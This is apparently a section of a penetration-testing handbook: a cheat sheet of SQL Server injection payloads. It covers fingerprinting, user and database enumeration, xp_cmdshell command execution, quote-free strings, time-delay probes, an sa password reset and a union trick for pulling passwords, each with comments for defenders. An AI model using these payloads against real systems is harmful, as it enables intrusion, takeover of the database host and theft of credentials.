4.1.7.1. SQL Server Payload
- Version
-- Returns the SQL Server build/version string; a common first probe to fingerprint the backend.
SELECT @@version
- Comment
-- SQL Server accepts both line comments (--) and block comments (/* */);
-- the block form may appear between tokens inside a statement, as the second line shows.
SELECT 1 -- comment
SELECT /*comment*/1
- Space
Byte values 0x01 - 0x20 are accepted as whitespace
- Current User
-- Four ways to read the identity of the current session.
-- user_name() and user: the database user the session is mapped to in the current database.
-- system_user: the server login that authenticated the session.
-- loginame from master..sysprocesses for @@SPID: the login name, read via the legacy process view.
-- Defenders: an application account has no need for these; seeing them in query logs is an enumeration signal.
SELECT user_name()
SELECT system_user
SELECT user
SELECT loginame FROM master..sysprocesses WHERE spid = @@SPID
- List User
-- Enumerates server logins via the legacy compatibility view (modern equivalent: sys.server_principals).
-- Which rows are visible depends on the caller's server-level permissions; audit reads of this view from application accounts.
SELECT name FROM master..syslogins
- Current Database
-- Name of the database the current connection is using.
SELECT DB_NAME()
- List Database
-- Lists the databases on the instance via the legacy compatibility view (modern equivalent: sys.databases).
-- Defenders: cross-database enumeration from an application login usually indicates injection or a compromised credential.
SELECT name FROM master..sysdatabases
- Command
-- Executes an OS command on the database host through the xp_cmdshell extended procedure,
-- running in the context of the SQL Server service account (or a configured proxy account).
-- xp_cmdshell is disabled by default and can only be enabled via sp_configure by a sysadmin;
-- defenders should keep it disabled, alert on its enablement, and audit every invocation.
EXEC xp_cmdshell 'net user'
- Ascii
-- char() and ascii() convert between code points and characters; '+' is T-SQL string concatenation,
-- so char(65)+char(66) yields 'AB' without any quote characters appearing in the query text.
-- Defenders: strings assembled from char() calls inside application queries are a classic injection indicator.
SELECT char(0x41)
SELECT ascii('A')
SELECT char(65)+char(66)
=> returns AB
- Delay
-- Blocks the session for the given hh:mm:ss interval (here 3 seconds).
-- Defenders: WAITFOR DELAY in application traffic is almost never legitimate and is the
-- usual indicator of time-based blind injection probing; alert on it.
WAITFOR DELAY '0:0:3'
pauses for 3 seconds
- Change Password
-- Resets the password of the built-in sysadmin login. This only succeeds when the current login
-- already holds ALTER ANY LOGIN or CONTROL SERVER rights, i.e. the instance is effectively already compromised.
-- Defenders: audit ALTER LOGIN events and keep the sa login disabled or renamed.
ALTER LOGIN [sa] WITH PASSWORD=N'NewPassword'
- Trick
id=1 union:select password from:user